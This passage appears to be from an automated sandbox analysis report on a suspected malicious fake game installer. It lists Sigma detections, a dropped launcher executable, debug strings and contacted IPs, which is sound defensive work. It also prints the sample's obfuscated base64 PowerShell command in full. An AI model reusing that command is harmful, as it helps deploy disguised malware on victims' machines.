SgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSA

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5136, TargetFilename: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2860, TargetFilename: C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSA

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe

ReversingLabs: Detection: 21%

Machine Learning detection for dropped file

Source: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe

Joe Sandbox ML: detected

Source: GTA5-elamigos.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb[ source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D91E000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \user\AppData\Local\Temp\14ynqbdy\14ynqbdy.pdbneAutomation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dll source: powershell.exe, 00000003.00000002.2156864943.000001B007620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb$Sb# source: powershell.exe, 00000007.00000002.2347659213.000001DADA187000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.pdb source: powershell.exe, 00000007.00000002.2294693432.000001DAC3306000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb4 source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbp; source: powershell.exe, 00000007.00000002.2347659213.000001DADA187000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.pdbhP source: powershell.exe, 00000007.00000002.2294693432.000001DAC3306000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbm source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2346608617.000001DAD9F4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2347850924.000001DADA1BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000007.00000002.2347490994.000001DADA170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.pdb source: powershell.exe, 00000003.00000002.2157122606.000001B008E0A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.pdbhP source: powershell.exe, 00000003.00000002.2157122606.000001B008E0A000.00000004.00000800.00020000.00000000.sdmp

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

